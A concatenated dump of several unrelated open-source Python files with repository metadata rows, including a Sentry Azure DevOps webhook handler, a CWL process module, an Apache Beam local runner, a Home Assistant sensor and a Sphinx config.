test_streams(client, nonadmin_client)
test_messages(client, nonadmin_client)
test_queues(client)
test_server_organizations(client)
test_errors(client)
sys.stdout.flush()
if REGISTERED_TEST_FUNCTIONS != CALLED_TEST_FUNCTIONS:
print("Error! Some @openapi_test_function tests were never called:")
print(" ", REGISTERED_TEST_FUNCTIONS - CALLED_TEST_FUNCTIONS)
sys.exit(1)
| apache-2.0 | 6,032,945,492,935,285,000 | 29.945267 | 100 | 0.642058 | false |
beeftornado/sentry | src/sentry/integrations/vsts/webhooks.py | 1 | 7161 | from __future__ import absolute_import
from .client import VstsApiClient
import logging
import six
from sentry.models import (
Identity,
Integration,
OrganizationIntegration,
sync_group_assignee_inbound,
)
from sentry.models.apitoken import generate_token
from sentry.api.base import Endpoint
from django.views.decorators.csrf import csrf_exempt
from django.utils.crypto import constant_time_compare
import re
UNSET = object()
# Pull email from the string: u'lauryn <[email protected]>'
EMAIL_PARSER = re.compile(r"<(.*)>")
logger = logging.getLogger("sentry.integrations")
PROVIDER_KEY = "vsts"
class WorkItemWebhook(Endpoint):
authentication_classes = ()
permission_classes = ()
def get_client(self, identity, oauth_redirect_url):
return VstsApiClient(identity, oauth_redirect_url)
@csrf_exempt
def dispatch(self, request, *args, **kwargs):
return super(WorkItemWebhook, self).dispatch(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
data = request.data
try:
event_type = data["eventType"]
external_id = data["resourceContainers"]["collection"]["id"]
except KeyError as e:
logger.info("vsts.invalid-webhook-payload", extra={"error": six.text_type(e)})
# https://docs.microsoft.com/en-us/azure/devops/service-hooks/events?view=azure-devops#workitem.updated
if event_type == "workitem.updated":
try:
integration = Integration.objects.get(
provider=PROVIDER_KEY, external_id=external_id
)
except Integration.DoesNotExist:
logger.info(
"vsts.integration-in-webhook-payload-does-not-exist",
extra={"external_id": external_id, "event_type": event_type},
)
try:
self.check_webhook_secret(request, integration)
logger.info(
"vsts.valid-webhook-secret",
extra={"event_type": event_type, "integration_id": integration.id},
)
except AssertionError:
logger.info(
"vsts.invalid-webhook-secret",
extra={"event_type": event_type, "integration_id": integration.id},
)
return self.respond(status=401)
self.handle_updated_workitem(data, integration)
return self.respond()
def check_webhook_secret(self, request, integration):
try:
integration_secret = integration.metadata["subscription"]["secret"]
webhook_payload_secret = request.META["HTTP_SHARED_SECRET"]
# TODO(Steve): remove
logger.info(
"vsts.special-webhook-secret",
extra={
"integration_id": integration.id,
"integration_secret": six.text_type(integration_secret)[:6],
"webhook_payload_secret": six.text_type(webhook_payload_secret)[:6],
},
)
except KeyError as e:
logger.info(
"vsts.missing-webhook-secret",
extra={"error": six.text_type(e), "integration_id": integration.id},
)
assert constant_time_compare(integration_secret, webhook_payload_secret)
def handle_updated_workitem(self, data, integration):
project = None
try:
external_issue_key = data["resource"]["workItemId"]
project = data["resourceContainers"]["project"]["id"]
except KeyError as e:
logger.info(
"vsts.updating-workitem-does-not-have-necessary-information",
extra={"error": six.text_type(e), "integration_id": integration.id},
)
try:
assigned_to = data["resource"]["fields"].get("System.AssignedTo")
status_change = data["resource"]["fields"].get("System.State")
except KeyError as e:
logger.info(
"vsts.updated-workitem-fields-not-passed",
extra={
"error": six.text_type(e),
"workItemId": data["resource"]["workItemId"],
"integration_id": integration.id,
"azure_project_id": project,
},
)
return # In the case that there are no fields sent, no syncing can be done
logger.info(
"vsts.updated-workitem-fields-correct",
extra={
"workItemId": data["resource"]["workItemId"],
"integration_id": integration.id,
"azure_project_id": project,
},
)
self.handle_assign_to(integration, external_issue_key, assigned_to)
self.handle_status_change(integration, external_issue_key, status_change, project)
def handle_assign_to(self, integration, external_issue_key, assigned_to):
if not assigned_to:
return
new_value = assigned_to.get("newValue")
if new_value is not None:
try:
email = self.parse_email(new_value)
except AttributeError as e:
logger.info(
"vsts.failed-to-parse-email-in-handle-assign-to",
extra={
"error": six.text_type(e),
"integration_id": integration.id,
"assigned_to_values": assigned_to,
"external_issue_key": external_issue_key,
},
)
return # TODO(lb): return if cannot parse email?
assign = True
else:
email = None
assign = False
sync_group_assignee_inbound(
integration=integration,
email=email,
external_issue_key=external_issue_key,
assign=assign,
)
def handle_status_change(self, integration, external_issue_key, status_change, project):
if status_change is None:
return
organization_ids = OrganizationIntegration.objects.filter(
integration_id=integration.id
).values_list("organization_id", flat=True)
for organization_id in organization_ids:
installation = integration.get_installation(organization_id)
data = {
"new_state": status_change["newValue"],
# old_state is None when the issue is New
"old_state": status_change.get("oldValue"),
"project": project,
}
installation.sync_status_inbound(external_issue_key, data)
def parse_email(self, email):
# TODO(lb): hmm... this looks brittle to me
return EMAIL_PARSER.search(email).group(1)
def create_subscription(self, instance, identity_data, oauth_redirect_url):
client = self.get_client(Identity(data=identity_data), oauth_redirect_url)
shared_secret = generate_token()
return client.create_subscription(instance, shared_secret), shared_secret
| bsd-3-clause | -2,832,467,956,054,932,500 | 37.294118 | 111 | 0.569055 | false |
foreveremain/common-workflow-language | reference/cwltool/process.py | 1 | 3893 | import avro.schema
import os
import json
import avro_ld.validate as validate
import copy
import yaml
import copy
import logging
import pprint
from aslist import aslist
import avro_ld.schema
import urlparse
import pprint
from pkg_resources import resource_stream
_logger = logging.getLogger("cwltool")
class WorkflowException(Exception):
pass
def get_schema():
f = resource_stream(__name__, 'schemas/draft-2/cwl-avro.yml')
j = yaml.load(f)
return (j, avro_ld.schema.schema(j))
def get_feature(self, feature):
for t in reversed(self.requirements):
if t["class"] == feature:
return (t, True)
for t in reversed(self.hints):
if t["class"] == feature:
return (t, False)
return (None, None)
class Process(object):
def __init__(self, toolpath_object, validateAs, do_validate=True, **kwargs):
(_, self.names) = get_schema()
self.tool = toolpath_object
if do_validate:
try:
# Validate tool documument
validate.validate_ex(self.names.get_name(validateAs, ""), self.tool, strict=kwargs.get("strict"))
except validate.ValidationException as v:
raise validate.ValidationException("Could not validate %s as %s:\n%s" % (self.tool.get("id"), validateAs, validate.indent(str(v))))
self.requirements = kwargs.get("requirements", []) + self.tool.get("requirements", [])
self.hints = kwargs.get("hints", []) + self.tool.get("hints", [])
self.validate_hints(self.tool.get("hints", []), strict=kwargs.get("strict"))
self.schemaDefs = {}
sd, _ = self.get_requirement("SchemaDefRequirement")
if sd:
for i in sd["types"]:
avro.schema.make_avsc_object(i, self.names)
self.schemaDefs[i["name"]] = i
# Build record schema from inputs
self.inputs_record_schema = {"name": "input_record_schema", "type": "record", "fields": []}
for i in self.tool["inputs"]:
c = copy.copy(i)
doc_url, fragment = urlparse.urldefrag(c['id'])
c["name"] = fragment
del c["id"]
if "type" not in c:
raise validate.ValidationException("Missing `type` in parameter `%s`" % c["name"])
if "default" in c:
c["type"] = ["null"] + aslist(c["type"])
else:
c["type"] = c["type"]
self.inputs_record_schema["fields"].append(c)
avro.schema.make_avsc_object(self.inputs_record_schema, self.names)
self.outputs_record_schema = {"name": "outputs_record_schema", "type": "record", "fields": []}
for i in self.tool["outputs"]:
c = copy.copy(i)
doc_url, fragment = urlparse.urldefrag(c['id'])
c["name"] = fragment
del c["id"]
if "type" not in c:
raise validate.ValidationException("Missing `type` in parameter `%s`" % c["name"])
if "default" in c:
c["type"] = ["null"] + aslist(c["type"])
else:
c["type"] = c["type"]
self.outputs_record_schema["fields"].append(c)
avro.schema.make_avsc_object(self.outputs_record_schema, self.names)
def validate_hints(self, hints, strict):
for r in hints:
try:
if self.names.get_name(r["class"], "") is not None:
validate.validate_ex(self.names.get_name(r["class"], ""), r, strict=strict)
else:
_logger.info(validate.ValidationException("Unknown hint %s" % (r["class"])))
except validate.ValidationException as v:
raise validate.ValidationException("Validating hint `%s`: %s" % (r["class"], str(v)))
def get_requirement(self, feature):
return get_feature(self, feature)
| apache-2.0 | -9,149,455,562,665,673,000 | 34.715596 | 147 | 0.571025 | false |
staslev/incubator-beam | sdks/python/apache_beam/runners/portability/universal_local_runner.py | 4 | 14119 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
import logging
import os
import Queue as queue
import socket
import subprocess
import sys
import threading
import time
import traceback
import uuid
from concurrent import futures
import grpc
from google.protobuf import text_format
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import runner
from apache_beam.runners.portability import fn_api_runner
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.STOPPED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
class UniversalLocalRunner(runner.PipelineRunner):
"""A BeamRunner that executes Python pipelines via the Beam Job API.
By default, this runner executes in process but still uses GRPC to communicate
pipeline and worker state. It can also be configured to use inline calls
rather than GRPC (for speed) or launch completely separate subprocesses for
the runner and worker(s).
"""
def __init__(self, use_grpc=True, use_subprocesses=False):
if use_subprocesses and not use_grpc:
raise ValueError("GRPC must be used with subprocesses")
super(UniversalLocalRunner, self).__init__()
self._use_grpc = use_grpc
self._use_subprocesses = use_subprocesses
self._job_service = None
self._job_service_lock = threading.Lock()
self._subprocess = None
def __del__(self):
# Best effort to not leave any dangling processes around.
self.cleanup()
def cleanup(self):
if self._subprocess:
self._subprocess.kill()
time.sleep(0.1)
self._subprocess = None
def _get_job_service(self):
with self._job_service_lock:
if not self._job_service:
if self._use_subprocesses:
self._job_service = self._start_local_runner_subprocess_job_service()
elif self._use_grpc:
self._servicer = JobServicer(use_grpc=True)
self._job_service = beam_job_api_pb2_grpc.JobServiceStub(
grpc.insecure_channel(
'localhost:%d' % self._servicer.start_grpc()))
else:
self._job_service = JobServicer(use_grpc=False)
return self._job_service
def _start_local_runner_subprocess_job_service(self):
if self._subprocess:
# Kill the old one if it exists.
self._subprocess.kill()
# TODO(robertwb): Consider letting the subprocess pick one and
# communicate it back...
port = _pick_unused_port()
logging.info("Starting server on port %d.", port)
self._subprocess = subprocess.Popen([
sys.executable,
'-m',
'apache_beam.runners.portability.universal_local_runner_main',
'-p',
str(port),
'--worker_command_line',
'%s -m apache_beam.runners.worker.sdk_worker_main' % sys.executable
])
job_service = beam_job_api_pb2_grpc.JobServiceStub(
grpc.insecure_channel('localhost:%d' % port))
logging.info("Waiting for server to be ready...")
start = time.time()
timeout = 30
while True:
time.sleep(0.1)
if self._subprocess.poll() is not None:
raise RuntimeError(
"Subprocess terminated unexpectedly with exit code %d." %
self._subprocess.returncode)
elif time.time() - start > timeout:
raise RuntimeError(
"Pipeline timed out waiting for job service subprocess.")
else:
try:
job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id='[fake]'))
break
except grpc.RpcError as exn:
if exn.code != grpc.StatusCode.UNAVAILABLE:
# We were able to contact the service for our fake state request.
break
logging.info("Server ready.")
return job_service
def run(self, pipeline):
job_service = self._get_job_service()
prepare_response = job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job',
pipeline=pipeline.to_runner_api()))
run_response = job_service.Run(beam_job_api_pb2.RunJobRequest(
preparation_id=prepare_response.preparation_id))
return PipelineResult(job_service, run_response.job_id)
class PipelineResult(runner.PipelineResult):
def __init__(self, job_service, job_id):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
def cancel(self):
self._job_service.Cancel()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(
runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def wait_until_finish(self):
def read_messages():
for message in self._job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=self._job_id)):
self._messages.append(message)
threading.Thread(target=read_messages).start()
for state_response in self._job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)):
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
break
if self._state != runner.PipelineState.DONE:
raise RuntimeError(
"Pipeline %s failed in state %s." % (self._job_id, self._state))
class BeamJob(threading.Thread):
"""This class handles running and managing a single pipeline.
The current state of the pipeline is available as self.state.
"""
def __init__(self, job_id, pipeline_options, pipeline_proto,
use_grpc=True, sdk_harness_factory=None):
super(BeamJob, self).__init__()
self._job_id = job_id
self._pipeline_options = pipeline_options
self._pipeline_proto = pipeline_proto
self._use_grpc = use_grpc
self._sdk_harness_factory = sdk_harness_factory
self._log_queue = queue.Queue()
self._state_change_callbacks = [
lambda new_state: self._log_queue.put(
beam_job_api_pb2.JobMessagesResponse(
state_response=
beam_job_api_pb2.GetJobStateResponse(state=new_state)))
]
self._state = None
self.state = beam_job_api_pb2.JobState.STARTING
self.daemon = True
def add_state_change_callback(self, f):
self._state_change_callbacks.append(f)
@property
def log_queue(self):
return self._log_queue
@property
def state(self):
return self._state
@state.setter
def state(self, new_state):
for state_change_callback in self._state_change_callbacks:
state_change_callback(new_state)
self._state = new_state
def run(self):
with JobLogHandler(self._log_queue):
try:
fn_api_runner.FnApiRunner(
use_grpc=self._use_grpc,
sdk_harness_factory=self._sdk_harness_factory
).run_via_runner_api(self._pipeline_proto)
self.state = beam_job_api_pb2.JobState.DONE
except: # pylint: disable=bare-except
logging.exception("Error running pipeline.")
traceback.print_exc()
self.state = beam_job_api_pb2.JobState.FAILED
def cancel(self):
if self.state not in TERMINAL_STATES:
self.state = beam_job_api_pb2.JobState.CANCELLING
# TODO(robertwb): Actually cancel...
self.state = beam_job_api_pb2.JobState.CANCELLED
class JobServicer(beam_job_api_pb2_grpc.JobServiceServicer):
"""Servicer for the Beam Job API.
Manages one or more pipelines, possibly concurrently.
"""
def __init__(
self, worker_command_line=None, use_grpc=True):
self._worker_command_line = worker_command_line
self._use_grpc = use_grpc or bool(worker_command_line)
self._jobs = {}
def start_grpc(self, port=0):
self._server = grpc.server(futures.ThreadPoolExecutor(max_workers=3))
port = self._server.add_insecure_port('localhost:%d' % port)
beam_job_api_pb2_grpc.add_JobServiceServicer_to_server(self, self._server)
self._server.start()
return port
def Prepare(self, request, context=None):
# For now, just use the job name as the job id.
preparation_id = "%s-%s" % (request.job_name, uuid.uuid4())
if self._worker_command_line:
sdk_harness_factory = functools.partial(
SubprocessSdkWorker, self._worker_command_line)
else:
sdk_harness_factory = None
self._jobs[preparation_id] = BeamJob(
preparation_id, request.pipeline_options, request.pipeline,
use_grpc=self._use_grpc, sdk_harness_factory=sdk_harness_factory)
return beam_job_api_pb2.PrepareJobResponse(preparation_id=preparation_id)
def Run(self, request, context=None):
job_id = request.preparation_id
self._jobs[job_id].start()
return beam_job_api_pb2.RunJobResponse(job_id=job_id)
def GetState(self, request, context=None):
return beam_job_api_pb2.GetJobStateResponse(
state=self._jobs[request.job_id].state)
def Cancel(self, request, context=None):
self._jobs[request.job_id].cancel()
return beam_job_api_pb2.CancelJobRequest(
state=self._jobs[request.job_id].state)
def GetStateStream(self, request, context=None):
job = self._jobs[request.job_id]
state_queue = queue.Queue()
job.add_state_change_callback(lambda state: state_queue.put(state))
try:
current_state = state_queue.get()
except queue.Empty:
current_state = job.state
yield beam_job_api_pb2.GetJobStateResponse(
state=current_state)
while current_state not in TERMINAL_STATES:
current_state = state_queue.get(block=True)
yield beam_job_api_pb2.GetJobStateResponse(
state=current_state)
def GetMessageStream(self, request, context=None):
job = self._jobs[request.job_id]
current_state = job.state
while current_state not in TERMINAL_STATES:
msg = job.log_queue.get(block=True)
yield msg
if msg.HasField('state_response'):
current_state = msg.state_response.state
try:
while True:
yield job.log_queue.get(block=False)
except queue.Empty:
pass
class SubprocessSdkWorker(object):
"""Manages a SDK worker implemented as a subprocess communicating over grpc.
"""
def __init__(self, worker_command_line, control_address):
self._worker_command_line = worker_command_line
self._control_address = control_address
def run(self):
control_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url=self._control_address))
p = subprocess.Popen(
self._worker_command_line,
shell=True,
env=dict(os.environ,
CONTROL_API_SERVICE_DESCRIPTOR=control_descriptor))
try:
p.wait()
if p.returncode:
raise RuntimeError(
"Worker subprocess exited with return code %s" % p.returncode)
finally:
if p.poll() is None:
p.kill()
class JobLogHandler(logging.Handler):
"""Captures logs to be returned via the Beam Job API.
Enabled via the with statement."""
# Mapping from logging levels to LogEntry levels.
LOG_LEVEL_MAP = {
logging.FATAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.ERROR: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.WARNING: beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING,
logging.INFO: beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC,
logging.DEBUG: beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG,
}
def __init__(self, message_queue):
super(JobLogHandler, self).__init__()
self._message_queue = message_queue
self._last_id = 0
self._logged_thread = None
def __enter__(self):
# Remember the current thread to demultiplex the logs of concurrently
# running pipelines (as Python log handlers are global).
self._logged_thread = threading.current_thread()
logging.getLogger().addHandler(self)
def __exit__(self, *args):
self._logged_thread = None
self.close()
def _next_id(self):
self._last_id += 1
return str(self._last_id)
def emit(self, record):
if self._logged_thread is threading.current_thread():
self._message_queue.put(beam_job_api_pb2.JobMessagesResponse(
message_response=beam_job_api_pb2.JobMessage(
message_id=self._next_id(),
time=time.strftime(
'%Y-%m-%d %H:%M:%S.', time.localtime(record.created)),
importance=self.LOG_LEVEL_MAP[record.levelno],
message_text=self.format(record))))
def _pick_unused_port():
"""Not perfect, but we have to provide a port to the subprocess."""
# TODO(robertwb): Consider letting the subprocess communicate a choice of
# port back.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 0))
_, port = s.getsockname()
s.close()
return port
| apache-2.0 | -2,771,854,493,337,775,600 | 33.520782 | 80 | 0.675331 | false |
dstoe/vigra | vigranumpy/lib/pyqt/viewer2svg.py | 6 | 5276 | from __future__ import print_function
import os
from PyQt4 import QtCore, QtGui
def viewer2svg(viewer, basepath, onlyVisible = False, moveBy = QtCore.QPointF(0.5, 0.5)):
outvec=[]
outvec.append('<?xml version="1.0" standalone="no"?>\n')
outvec.append('<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"\n')
outvec.append(' "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">\n')
pngFilename = basepath + "_bg.png"
viewer.image.writeImage(pngFilename, "")
_, bgFilename = os.path.split(pngFilename)
outvec.append('\n<svg version="1.1" xmlns="http://www.w3.org/2000/svg"\n')
outvec.append(' width="21cm" height="29.7cm" preserveAspectRatio="xMinYMin meet"\n')
outvec.append(' viewBox="-1 -1 ' + str(viewer.image.width + 1) + ' ' + \
str(viewer.image.height + 1) + '" xmlns:xlink="http://www.w3.org/1999/xlink">\n')
outvec.append('\n<g style="fill:none">\n')
outvec.append('\n<image xlink:href="' + bgFilename + '"\n')
outvec.append(' x="0" y="0" width="' + str(viewer.image.width) + '" height="' + \
str(viewer.image.height) + '" />\n')
ovs = []
for ov in viewer.overlays:
if onlyVisible and not ov.isVisible():
continue
ovname = viewer._defaultOverlayName(ov)
if ovname == "MapOverlay":
ovs.append([viewer._defaultOverlayName(ov.eo), ov.eo])
ovs.append([viewer._defaultOverlayName(ov.po), ov.po])
else:
ovs.append([ovname, ov])
for overlay in ovs:
if overlay[0] == "EdgeOverlay":
overlay = overlay[1]
color = 'rgb' + str(overlay.color.getRgb()[:3]) + '; opacity:' + str(overlay.color.getRgb()[-1] / 255.0)
if not overlay.colors:
for i, edge in enumerate(overlay.originalEdges):
outvec.append(writeEdge(edge, overlay.width, color, moveBy))
else:
for i, edge in enumerate(overlay.originalEdges):
if len(overlay.colors) > i:
color = overlay.colors[i] if hasattr(overlay.colors[i], "getRgb") else \
QtGui.QColor(overlay.colors[i])
color = 'rgb' + str(color.getRgb()[:3]) + '; opacity:' + str(color.getRgb()[-1] / 255.0)
outvec.append(writeEdge(edge, overlay.width, color, moveBy))
elif overlay[0] == "PointOverlay":
overlay = overlay[1]
color = ' style="fill:rgb' + str(overlay.color.getRgb()[:3]) + '; opacity:' + str(overlay.color.getRgb()[-1] / 255.0) + '"/>\n'
radius = '" r="' + str(overlay.radius if overlay.radius > 0 else 0.5) + '"\n'
pointList = []
for point in overlay.originalPoints:
pointList.append(QtCore.QPointF(*point) + moveBy)
for point in pointList:
outvec.append('<circle cx="' + str(point.x()) + '" cy="' + str(point.y()) + radius + color)
elif overlay[0] == "TextOverlay":
overlay = overlay[1]
for element in overlay.textlist:
if len(element) == 4:
outvec.extend(writeText(text = element[0], position = element[1], color = element[2], size = element[3]))
elif len(element) == 3:
outvec.extend(writeText(text = element[0], position = element[1], color = element[2]))
else:
outvec.extend(writeText(text = element[0], position = element[1]))
else:
print(str(overlay[0]) + " not supported yet.\n")
outvec.append('\n</g>\n')
outvec.append('</svg>\n')
f = open(basepath + ".svg", 'w')
for line in outvec:
f.write(line)
f.close()
def writeEdge(edge, width, color, moveBy):
qpolf = QtGui.QPolygonF(len(edge))
for i, (x, y) in enumerate(edge):
qpolf[i] = QtCore.QPointF(x,y) + moveBy
result = "\n"
if qpolf.size() == 2:
result += '<line x1="' + str(qpolf[0].x()) + '" y1="' + str(qpolf[0].y()) + '" '
result += 'x2="' + str(qpolf[1].x()) + '" y2="' + str(qpolf[1].y())
elif qpolf.size() > 2:
result += '<polyline points="' + str(qpolf[0].x()) + '" y1="' + str(qpolf[0].y())
for pos in range(1, qpolf.size()):
result += ' ' + str(qpolf[pos].x()) + '" y1="' + str(qpolf[pos].y())
result += '"\n style="stroke:' + color + '; stroke-width:' + str(width if width > 0 else 0.5) + ';\n'
result += ' stroke-linejoin:bevel; stroke-linecap:butt;"/>\n'
return result
def writeText(text, position, color = None, size = None):
if not size:
size= "6"
if not color:
color = 'fill:rgb(0, 255, 0); opacity:1; stroke:rgb(0, 0, 0); stroke-width:0.3;'
else:
color = 'fill:rgb' + str(QtGui.QColor(color).getRgb()[:3]) + '; opacity:' + \
str(QtGui.QColor(color).getRgb()[-1] / 255.0) + '; stroke:rgb(0, 0, 0); stroke-width:0.3;'
style = ' style="' + color + '\n dominant-baseline: central; ' + \
'text-anchor: middle; font-size: ' + str(size) + 'pt; font-family: sans-serif"'
return '\n<text x="' + str(position[0]) + '" y="' + str(position[1]) + '"\n' + \
style + '>' + text.toUtf8().data() + '</text>\n'
| mit | -1,960,437,019,781,107,500 | 46.963636 | 140 | 0.540182 | false |
jabesq/home-assistant | homeassistant/components/verisure/binary_sensor.py | 8 | 1701 | """Support for Verisure binary sensors."""
import logging
from homeassistant.components.binary_sensor import BinarySensorDevice
from . import CONF_DOOR_WINDOW, HUB as hub
_LOGGER = logging.getLogger(__name__)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Verisure binary sensors."""
sensors = []
hub.update_overview()
if int(hub.config.get(CONF_DOOR_WINDOW, 1)):
sensors.extend([
VerisureDoorWindowSensor(device_label)
for device_label in hub.get(
"$.doorWindow.doorWindowDevice[*].deviceLabel")])
add_entities(sensors)
class VerisureDoorWindowSensor(BinarySensorDevice):
"""Representation of a Verisure door window sensor."""
def __init__(self, device_label):
"""Initialize the Verisure door window sensor."""
self._device_label = device_label
@property
def name(self):
"""Return the name of the binary sensor."""
return hub.get_first(
"$.doorWindow.doorWindowDevice[?(@.deviceLabel=='%s')].area",
self._device_label)
@property
def is_on(self):
"""Return the state of the sensor."""
return hub.get_first(
"$.doorWindow.doorWindowDevice[?(@.deviceLabel=='%s')].state",
self._device_label) == "OPEN"
@property
def available(self):
"""Return True if entity is available."""
return hub.get_first(
"$.doorWindow.doorWindowDevice[?(@.deviceLabel=='%s')]",
self._device_label) is not None
# pylint: disable=no-self-use
def update(self):
"""Update the state of the sensor."""
hub.update_overview()
| apache-2.0 | 2,645,123,012,917,404,700 | 29.927273 | 74 | 0.621399 | false |
andymcbride/SensorMonitor | test_storage.py | 1 | 2017 | import unittest
from storage import Storage
from sensor import SensorData
from pathlib2 import Path
from sqlite3 import IntegrityError
class MyTestCase(unittest.TestCase):
def setUp(self):
self.filename = 'test.db'
self.storage = Storage(self.filename)
def tearDown(self):
path = Path(self.filename)
path.unlink()
def test_db_creates(self):
path = Path(self.filename)
self.assertEqual(True, path.is_file())
def test_table_not_exist(self):
self.assertEqual(False, self.storage.table_exists('data'))
def test_table_created(self):
# create table
self.storage.initialize_tables()
self.assertEqual(True, self.storage.table_exists('data'))
self.assertEqual(True, self.storage.table_exists('sensors'))
def test_create_sensor(self):
self.storage.initialize_tables()
self.storage.create_sensor_if_not_exists('Test', 'Temp')
def test_create_sensor_fail(self):
self.storage.initialize_tables()
with self.assertRaises(IntegrityError):
self.storage.create_sensor_if_not_exists(None, None)
def test_get_sensor_id(self):
self.storage.initialize_tables()
sensor_id = self.storage.create_sensor_if_not_exists('real', 'test')
self.assertNotEqual(sensor_id, None)
self.assertEqual(sensor_id, 1)
def test_get_sensor_id_fail(self):
self.storage.initialize_tables()
with self.assertRaises(ValueError):
sensor_id = self.storage.get_id('FAKE')
def test_save_sensor_data(self):
self.storage.initialize_tables()
sensor_id = self.storage.create_sensor_if_not_exists('real', 'test')
value = SensorData(sensor_id=sensor_id)
value.add_value({'temperature': 90, 'humidity': 60})
self.storage.insert_sensor_data(value)
result = self.storage.get_latest_value(sensor_id)
self.assertEqual(value, result)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -6,787,078,605,793,974,000 | 32.065574 | 76 | 0.654437 | false |
kbase/KBaseSearchEngine | docsource/conf.py | 2 | 5238 | # -*- coding: utf-8 -*-
#
# KBaseSearchEngine documentation build configuration file, created by
# sphinx-quickstart on Wed Dec 6 20:18:36 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('_ext'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autosectionlabel',
'jsonlexer',
'numfig']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'KBaseSearchEngine'
copyright = u'KBase'
author = u'Gavin Price, Arfath Pasha'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.01'
# The full version, including alpha/beta/rc tags.
release = u'0.01'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
'**': [
'relations.html', # needs 'show_related': True theme option to display
'searchbox.html',
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'KBaseSearchEnginedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'KBaseSearchEngine.tex', u'KBaseSearchEngine Documentation',
u'Gavin Price, Arfath Pasha', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'kbasesearchengine', u'KBaseSearchEngine Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
